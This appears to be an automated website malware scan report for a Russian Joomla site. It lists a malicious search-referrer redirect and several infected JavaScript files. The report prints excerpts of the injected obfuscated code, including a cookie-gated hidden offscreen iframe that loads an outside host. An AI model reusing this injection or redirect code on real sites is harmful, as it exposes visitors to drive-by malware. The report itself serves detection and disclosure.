Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://g-kirova.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: g-kirova.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 28 Sep 2014 23:53:26 GMT Location: http://www.bolltec.com/media/jce/mediaplayer/license.php Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | malicious |
Scanned pages/files
Request | Server response | Status |
http://g-kirova.ru/ | 200 OK Content-Length: 78966 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js | 200 OK Content-Length: 66079 Content-Type: text/javascript | clean |
http://g-kirova.ru/media/system/js/caption.js | 200 OK Content-Length: 3733 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1851 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo var cookie = getCookie('berlingo8ausjtt176a7'); if (cookie == undefined) { setCookie('berlingo8ausjtt176a7', true, 260001); document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>'); } } })(); if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict(); Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 8831 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo Antivirus reports:
| ||
http://g-kirova.ru/templates/theme325/scripts/maxheight.js | 200 OK Content-Length: 2106 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } } })(); var maxHeight = function(classname) { var divs = document.getElements('div.' + classname); var max = 0; divs.each(function(div) { max = Math.max(max, div.getSize().size.y); }); divs.setStyle('height', max); return max; } window.addEvent('load', function() { maxHeight('eqal'); maxHeight.delay(500, maxHeight, 'equal'); }); Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_jalendar/js/jal.js | 200 OK Content-Length: 1978 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } } })(); function aj_nd(curmonth,curyear,mid) { new Ajax(server_url+'modules/mod_jalendar/mod_jalendar.php',{method: 'post',update: 'idcal',data:'curmonth='+curmonth+'&curyear='+curyear+'&mid='+mid}).request(); } Antivirus reports:
| ||
http://g-kirova.ru/modules/mod_ppc_fastfont/js/fastfont.js | 200 OK Content-Length: 4182 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } return null; }; window.onload = setUserOptions; function setUserOptions(){ if(!prefsLoaded){ cookie = readCookie("fontSize"); currentFontSize = cookie ? cookie : defaultFontSize; setFontSize(currentFontSize); prefsLoaded = true; } } window.onunload = saveSettings; function saveSettings() { createCookie("fontSize", currentFontSize, 365); } Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?2613249 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://g-kirova.ru/napisat-nam.html | 200 OK Content-Length: 57202 Content-Type: text/html | clean |
http://g-kirova.ru/media/system/js/validate.js | 200 OK Content-Length: 6016 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); }); Antivirus reports:
| ||
http://g-kirova.ru/karta-sajta.html | 404 ÐÐ¾Ð¼Ð¿Ð¾Ð½ÐµÐ½Ñ Ð½Ðµ найден Content-Length: 1844 Content-Type: text/html | clean |
http://g-kirova.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 23:53:35 GMT Location: http://g-kirova.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://g-kirova.ru/test404page.js | 404 Not Found Content-Length: 3621 Content-Type: text/html | clean |
http://g-kirova.ru/hosting_static_404/modernizr.js | 200 OK Content-Length: 6296 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=g-kirova.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://g-kirova.ru/
Result: g-kirova.ru is not infected or malware details are not published yet.
Result: g-kirova.ru is not infected or malware details are not published yet.